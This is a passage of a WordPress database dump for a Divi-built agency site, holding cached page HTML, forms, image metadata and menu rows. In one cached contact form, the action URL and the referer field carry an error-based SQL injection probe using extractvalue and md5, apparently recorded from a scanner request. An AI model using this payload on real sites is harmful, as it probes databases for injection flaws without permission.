class=\"et_pb_testimonial_author\">Sandeep</span>\n					<p class=\"et_pb_testimonial_meta\"><span class=\"et_pb_testimonial_position\">Marketing</span><span class=\"et_pb_testimonial_separator\">,</span> <span class=\"et_pb_testimonial_company\">Yamaha Motor Company</span></p>\n				</div> <!-- .et_pb_testimonial_description -->\n			</div> <!-- .et_pb_testimonial -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_12 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_15 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_29  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_17 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_18 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">We would love to connect up and join your brand journey. Do not hesitate to question/drop us a line, As discerning mind always take better decision.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_16 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_30  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_0 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"0\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://wthtest1.in8.cdn-alpha.com/index.php?s=member&#038;c=api&#038;m=checktitle&#038;id=13&#038;title=123&#038;module=news,(select%20extractvalue(1,concat(0x7e,md5(&#039;bsevn&#039;),0x7e)))%20as%20aaa\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_0\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_0\" class=\"input\" value=\"\" name=\"et_pb_contact_name_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last\" data-id=\"mobile_no\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_mobile_no_0\" class=\"et_pb_contact_form_label\">Mobile No</label>\n				<input type=\"text\" id=\"et_pb_contact_mobile_no_0\" class=\"input\" value=\"\" name=\"et_pb_contact_mobile_no_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"mobile_no\" placeholder=\"Mobile No\" pattern=\"[0-9s-]{10,10}\" title=\"Only numbers allowed.Minimum length: 10 characters. Maximum length: 10 characters.\" maxlength=\"10\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_0\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_0\" class=\"input\" value=\"\" name=\"et_pb_contact_email_0\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_0\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_0\" id=\"et_pb_contact_message_0\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n			<div class=\"et_pb_contact_right\">\n				<p class=\"clearfix\">\n					<span class=\"et_pb_contact_captcha_question\">9 + 9</span> = <input type=\"text\" size=\"2\" class=\"input et_pb_contact_captcha\" data-first_digit=\"9\" data-second_digit=\"9\" value=\"\" name=\"et_pb_contact_captcha_0\" data-required_mark=\"required\" autocomplete=\"off\">\n				</p>\n			</div><!-- .et_pb_contact_right -->\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"0f62e6cae5\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/index.php?s=member&#038;c=api&#038;m=checktitle&#038;id=13&#038;title=123&#038;module=news%2C%28select+extractvalue%281%2Cconcat%280x7e%2Cmd5%28%5C%27bsevn%5C%27%29%2C0x7e%29%29%29+as+aaa\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(351,134,'_et_pb_truncate_post_date','2022-12-26 08:05:49'),(352,134,'_et_builder_version','VB|Divi|4.5.6'),(353,134,'_et_pb_show_page_creation','off'),(354,134,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(382,194,'_wp_attached_file','2020/07/WTH-LOGIN.png'),(383,194,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:80;s:6:\"height\";i:80;s:4:\"file\";s:21:\"2020/07/WTH-LOGIN.png\";s:5:\"sizes\";a:0:{}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(384,194,'_wp_attachment_image_alt','WhatTheHell? Thumbnail'),(385,195,'_wp_attached_file','2020/07/cropped-WTH-LOGIN.png'),(386,195,'_wp_attachment_context','site-icon'),(387,195,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:512;s:6:\"height\";i:512;s:4:\"file\";s:29:\"2020/07/cropped-WTH-LOGIN.png\";s:5:\"sizes\";a:11:{s:6:\"medium\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-300x300.png\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:9:\"image/png\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-150x150.png\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-400x250.png\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:9:\"image/png\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-400x284.png\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:9:\"image/png\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-510x382.png\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:9:\"image/png\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-400x512.png\";s:5:\"width\";i:400;s:6:\"height\";i:512;s:9:\"mime-type\";s:9:\"image/png\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-480x480.png\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-270\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-270x270.png\";s:5:\"width\";i:270;s:6:\"height\";i:270;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-192\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-192x192.png\";s:5:\"width\";i:192;s:6:\"height\";i:192;s:9:\"mime-type\";s:9:\"image/png\";}s:13:\"site_icon-180\";a:4:{s:4:\"file\";s:29:\"cropped-WTH-LOGIN-180x180.png\";s:5:\"width\";i:180;s:6:\"height\";i:180;s:9:\"mime-type\";s:9:\"image/png\";}s:12:\"site_icon-32\";a:4:{s:4:\"file\";s:27:\"cropped-WTH-LOGIN-32x32.png\";s:5:\"width\";i:32;s:6:\"height\";i:32;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(426,205,'_wp_attached_file','2020/07/home-office-04-1.jpg'),(427,205,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:800;s:6:\"height\";i:800;s:4:\"file\";s:28:\"2020/07/home-office-04-1.jpg\";s:5:\"sizes\";a:9:{s:6:\"medium\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-300x300.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:300;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-768x768.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:768;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-post-main-image\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-400x250.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:31:\"et-pb-post-main-image-fullwidth\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-800x675.jpg\";s:5:\"width\";i:800;s:6:\"height\";i:675;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:21:\"et-pb-portfolio-image\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-400x284.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:284;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:28:\"et-pb-portfolio-module-image\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-510x382.jpg\";s:5:\"width\";i:510;s:6:\"height\";i:382;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:35:\"et-pb-gallery-module-image-portrait\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-400x516.jpg\";s:5:\"width\";i:400;s:6:\"height\";i:516;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:30:\"et-pb-image--responsive--phone\";a:4:{s:4:\"file\";s:28:\"home-office-04-1-480x480.jpg\";s:5:\"width\";i:480;s:6:\"height\";i:480;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(453,211,'_wp_attached_file','2020/07/Artboard.png'),(454,211,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:176;s:6:\"height\";i:22;s:4:\"file\";s:20:\"2020/07/Artboard.png\";s:5:\"sizes\";a:1:{s:9:\"thumbnail\";a:4:{s:4:\"file\";s:19:\"Artboard-150x22.png\";s:5:\"width\";i:150;s:6:\"height\";i:22;s:9:\"mime-type\";s:9:\"image/png\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(464,215,'_menu_item_type','custom'),(465,215,'_menu_item_menu_item_parent','0'),(466,215,'_menu_item_object_id','215'),(467,215,'_menu_item_object','custom'),(468,215,'_menu_item_target',''),(469,215,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(470,215,'_menu_item_xfn',''),(471,215,'_menu_item_url','https://www.whatelse.asia/'),(472,216,'_menu_item_type','custom'),(473,216,'_menu_item_menu_item_parent','0'),(474,216,'_menu_item_object_id','216'),(475,216,'_menu_item_object','custom'),(476,216,'_menu_item_target',''),(477,216,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(478,216,'_menu_item_xfn',''),(479,216,'_menu_item_url','https://mail.whatthehell.co/'),(480,217,'_menu_item_type','custom'),(481,217,'_menu_item_menu_item_parent','0'),(482,217,'_menu_item_object_id','217'),(483,217,'_menu_item_object','custom'),(484,217,'_menu_item_target',''),(485,217,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(486,217,'_menu_item_xfn',''),(487,217,'_menu_item_url','https://social.whatthehell.co/'),(494,221,'_edit_lock','1594055723:1'),(495,221,'_et_pb_use_builder','on'),(496,221,'_et_gb_content_width',''),(497,221,'_edit_last','1'),(498,221,'_et_pb_post_hide_nav','default'),(499,221,'_et_pb_page_layout','et_right_sidebar'),(500,221,'_et_pb_side_nav','off'),(501,221,'_et_pb_built_for_post_type','page'),(510,221,'_et_pb_ab_subjects',''),(511,221,'_et_pb_enable_shortcode_tracking',''),(512,221,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"221\" /]'),(513,221,'_et_pb_custom_css',''),(514,221,'_et_pb_gutter_width','3'),(515,221,'_thumbnail_id','0'),(516,221,'_et_pb_first_image',''),(517,221,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_0 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Our Blog</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_divider_0 et_animated et_pb_space et_pb_divider_hidden\"><div class=\"et_pb_divider_internal\"></div></div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_1 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_1 et_pb_gutters2\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_1  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_with_border et_pb_module et_pb_blog_0 et_animated et_pb_blog_grid_wrapper\">\n					<div class=\"et_pb_blog_grid clearfix \">\n					\n					\n					<div class=\"et_pb_ajax_pagination_container\">\n						<div class=\"et_pb_salvattore_content\" data-columns>\n			<article id=\"post-1\" class=\"et_pb_post clearfix et_pb_no_thumb et_pb_blog_item_0_0 post-1 post type-post status-publish format-standard hentry category-uncategorized\">\n\n			\n												<h2 class=\"entry-title\"><a href=\"https://52.66.212.87/2020/02/19/hello-world/\">Hello world!</a></h2>\n				\n				<p class=\"post-meta\">by <span class=\"author vcard\"><a href=\"https://52.66.212.87/author/user/\" title=\"Posts by user\" rel=\"author\">user</a></span> | <span class=\"published\">Feb 19, 2020</span></p><div class=\"post-content\"><div class=\"post-content-inner\"><p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n</div></div>			\n			</article> <!-- .et_pb_post -->\n			</div><!-- .et_pb_salvattore_content --><div><div class=\"pagination clearfix\">\n	<div class=\"alignleft\"></div>\n	<div class=\"alignright\"></div>\n</div></div></div> <!-- .et_pb_posts -->\n					</div>\n					 \n				</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_2 et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_2\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_2  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_signup_0 et_animated et_hover_enabled et_pb_newsletter_layout_left_right et_pb_newsletter et_pb_subscribe clearfix  et_pb_text_align_left et_pb_bg_layout_light et_pb_no_bg\">\n				\n				\n				<div class=\"et_pb_newsletter_description\"><h2 class=\"et_pb_module_header\">Join Our Newsletter</h2><div>Curabitur aliquam justo ex, ac varius sem facilisis a. In vel felis eros. Fusce ipsum enim, ultrices at ante sollicitudin, faucibus hendrerit nunc. Nullam tempor nulla eu imperdiet interdum. Mauris euismod mattis consectetur. </div></div>\n				\n				<div class=\"et_pb_newsletter_form\">\n					<form method=\"post\">\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_error\"></div>\n						<div class=\"et_pb_newsletter_result et_pb_newsletter_success\">\n							<h2>Success!</h2>\n						</div>\n						<div class=\"et_pb_newsletter_fields\">\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_firstname\" style=\"display: none;\">Name</label>\n						<input id=\"et_pb_signup_firstname\" class=\"input\" type=\"text\" placeholder=\"Name\" name=\"et_pb_signup_firstname\">\n					</p>\n							\n							\n					<p class=\"et_pb_newsletter_field et_pb_contact_field_last et_pb_contact_field_last_tablet et_pb_contact_field_last_phone\">\n						<label class=\"et_pb_contact_form_label\" for=\"et_pb_signup_email\" style=\"display: none;\">Email</label>\n						<input id=\"et_pb_signup_email\" class=\"input\" type=\"text\" placeholder=\"Email\" name=\"et_pb_signup_email\">\n					</p>\n							\n							\n					<p class=\"et_pb_newsletter_button_wrap\">\n						<a class=\"et_pb_newsletter_button et_pb_button et_pb_custom_button_icon\" href=\"#\" data-icon=\"&#x45;\">\n							<span class=\"et_subscribe_loader\"></span>\n							<span class=\"et_pb_newsletter_button_text\">Subscribe</span>\n						</a>\n					</p>\n							\n						</div>\n						\n						<input type=\"hidden\" value=\"mailchimp\" name=\"et_pb_signup_provider\" />\n						<input type=\"hidden\" value=\"03dac884f0\" name=\"et_pb_signup_list_id\" />\n						<input type=\"hidden\" value=\"MailChimp\" name=\"et_pb_signup_account_name\" />\n						<input type=\"hidden\" value=\"true\" name=\"et_pb_signup_ip_address\" /><input type=\"hidden\" value=\"429ced8d0804d40a3dd7cf3f720f4966\" name=\"et_pb_signup_checksum\" />\n					</form>\n				</div>\n			</div>\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_3 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_3 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_3  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_1 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Let&#8217;s Start Something newSay Hello!</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_2 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Excepteur sint occaecat cupidatat non proident, sunt in culpa qui officia deserunt mollit laborum. Sed ut perspiciatis unde omnis.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row --><div class=\"et_pb_row et_pb_row_4 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_4  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				\n			<div id=\"et_pb_contact_form_0\" class=\"et_pb_module et_pb_contact_form_0 et_animated et_pb_contact_form_container clearfix\" data-form_unique_num=\"0\">\n				\n				\n				\n				<div class=\"et-pb-contact-message\"></div>\n				\n				<div class=\"et_pb_contact\">\n					<form class=\"et_pb_contact_form clearfix\" method=\"post\" action=\"https://52.66.212.87/index.php?s=captcha\">\n						<p class=\"et_pb_contact_field et_pb_contact_field_0 et_pb_contact_field_last\" data-id=\"name\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_name_0\" class=\"et_pb_contact_form_label\">Name</label>\n				<input type=\"text\" id=\"et_pb_contact_name_0\" class=\"input\" value=\"\" name=\"et_pb_contact_name_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"name\" placeholder=\"Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_1 et_pb_contact_field_last\" data-id=\"email\" data-type=\"email\">\n				\n				\n				<label for=\"et_pb_contact_email_0\" class=\"et_pb_contact_form_label\">Email Address</label>\n				<input type=\"text\" id=\"et_pb_contact_email_0\" class=\"input\" value=\"\" name=\"et_pb_contact_email_0\" data-required_mark=\"required\" data-field_type=\"email\" data-original_id=\"email\" placeholder=\"Email Address\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_2 et_pb_contact_field_last\" data-id=\"company\" data-type=\"input\">\n				\n				\n				<label for=\"et_pb_contact_company_0\" class=\"et_pb_contact_form_label\">Company Name</label>\n				<input type=\"text\" id=\"et_pb_contact_company_0\" class=\"input\" value=\"\" name=\"et_pb_contact_company_0\" data-required_mark=\"required\" data-field_type=\"input\" data-original_id=\"company\" placeholder=\"Company Name\">\n			</p><p class=\"et_pb_contact_field et_pb_contact_field_3 et_pb_contact_field_last\" data-id=\"message\" data-type=\"text\">\n				\n				\n				<label for=\"et_pb_contact_message_0\" class=\"et_pb_contact_form_label\">Message</label>\n				<textarea name=\"et_pb_contact_message_0\" id=\"et_pb_contact_message_0\" class=\"et_pb_contact_message input\" data-required_mark=\"required\" data-field_type=\"text\" data-original_id=\"message\" placeholder=\"Message\"></textarea>\n			</p>\n						<input type=\"hidden\" value=\"et_contact_proccess\" name=\"et_pb_contactform_submit_0\"/>\n						<div class=\"et_contact_bottom_container\">\n							\n							<button type=\"submit\" name=\"et_builder_submit_button\" class=\"et_pb_contact_submit et_pb_button et_pb_custom_button_icon\" data-icon=\"&#x45;\">Send</button>\n						</div>\n						<input type=\"hidden\" id=\"_wpnonce-et-pb-contact-form-submitted-0\" name=\"_wpnonce-et-pb-contact-form-submitted-0\" value=\"dba23e15d5\" /><input type=\"hidden\" name=\"_wp_http_referer\" value=\"/index.php?s=captcha\" />\n					</form>\n				</div> <!-- .et_pb_contact -->\n			</div> <!-- .et_pb_contact_form_container -->\n			\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --></p>\n'),(518,221,'_et_pb_truncate_post_date','2020-07-09 04:02:09'),(519,221,'_et_builder_version','VB|Divi|4.4.9'),(520,221,'_et_pb_show_page_creation','off'),(521,226,'_edit_lock','1595972366:1'),(522,226,'_et_pb_use_builder','off'),(523,226,'_et_gb_content_width',''),(524,226,'_edit_last','1'),(525,226,'_et_pb_post_hide_nav','default'),(526,226,'_et_pb_page_layout','et_right_sidebar'),(527,226,'_et_pb_side_nav','off'),(528,226,'_et_pb_built_for_post_type','page'),(529,226,'_et_pb_ab_subjects',''),(530,226,'_et_pb_enable_shortcode_tracking',''),(531,226,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"226\" /]'),(532,226,'_et_pb_custom_css',''),(533,226,'_et_pb_gutter_width','3'),(534,226,'_thumbnail_id','0'),(535,226,'_et_pb_first_image',''),(536,226,'_et_pb_truncate_post',''),(537,226,'_et_pb_truncate_post_date',''),(538,226,'_et_builder_version','VB|Divi|4.4.9'),(539,226,'_et_pb_show_page_creation','off'),(540,221,'et_enqueued_post_fonts','a:2:{s:6:\"family\";a:1:{s:16:\"et-gf-montserrat\";s:137:\"Montserrat:100,100italic,200,200italic,300,300italic,regular,italic,500,500italic,600,600italic,700,700italic,800,800italic,900,900italic\";}s:6:\"subset\";a:2:{i:0;s:5:\"latin\";i:1;s:9:\"latin-ext\";}}'),(541,1,'_et_pb_use_builder','on'),(542,1,'_et_pb_show_page_creation','on'),(543,1,'_et_pb_old_content','<!-- wp:paragraph -->\n<p>Welcome to WordPress. This is your first post. Edit or delete it, then start writing!</p>\n<!-- /wp:paragraph -->'),(546,1,'amazon_polly_audio_location',''),(549,236,'_edit_lock','1594066217:1'),(550,236,'_et_pb_use_builder','on'),(551,236,'_et_gb_content_width',''),(552,236,'_edit_last','1'),(553,236,'_et_pb_post_hide_nav','default'),(554,236,'_et_pb_page_layout','et_right_sidebar'),(555,236,'_et_pb_side_nav','off'),(560,236,'_et_pb_built_for_post_type','page'),(569,236,'_et_pb_ab_subjects',''),(570,236,'_et_pb_enable_shortcode_tracking',''),(571,236,'_et_pb_ab_current_shortcode','[et_pb_split_track id=\"236\" /]'),(572,236,'_et_pb_custom_css',''),(573,236,'_et_pb_gutter_width','3'),(574,236,'_thumbnail_id','0'),(575,236,'_et_pb_first_image',''),(576,236,'_et_pb_truncate_post','<p><div class=\"et_pb_section et_pb_section_0 et_animated et_pb_with_background et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_0 et_animated\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_0  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_text et_pb_text_0 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Product Design</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_1 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">My Project</div>\n			</div> <!-- .et_pb_text --><div class=\"et_pb_module et_pb_text et_pb_text_2 et_animated  et_pb_text_align_left et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Lorem Ipsum is simply dummy text of the printing and typesetting industry. Lorem Ipsum has been the industry&#8217;s standard dummy text ever.</div>\n			</div> <!-- .et_pb_text -->\n			</div> <!-- .et_pb_column -->\n				\n				\n			</div> <!-- .et_pb_row -->\n				\n				\n			</div> <!-- .et_pb_section --><div class=\"et_pb_section et_pb_section_1 et_section_regular\" >\n				\n				\n				\n				\n					<div class=\"et_pb_row et_pb_row_1\">\n				<div class=\"et_pb_column et_pb_column_4_4 et_pb_column_1  et_pb_css_mix_blend_mode_passthrough et-last-child\">\n				\n				\n				<div class=\"et_pb_module et_pb_image et_pb_image_0 et_animated et-waypoint\">\n				\n				\n				<a href=\"https://52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png\" class=\"et_pb_lightbox_image\" title=\"\"><span class=\"et_pb_image_wrap \"><img src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png?w=1080&#038;ssl=1\" alt title data-recalc-dims=\"1\" data-lazy-src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png?w=1080&amp;is-pending-load=1#038;ssl=1\" srcset=\"data:image/gif;base64,R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\" class=\" jetpack-lazy-image\"><noscript><img src=\"https://i1.wp.com/52.66.212.87/wp-content/uploads/2020/07/MB-purefront-03-1.png?w=1080&#038;ssl=1\" alt=\"\" title=\"\" data-recalc-dims=\"1\" /></noscript></span></a>\n			</div><div class=\"et_pb_module et_pb_text et_pb_text_3 et_animated  et_pb_text_align_center et_pb_bg_layout_light\">\n				\n				\n				<div class=\"et_pb_text_inner\">Donec tempor tortor sit amet sodales blandit. Suspendisse potenti. Proin at commodo lectus. 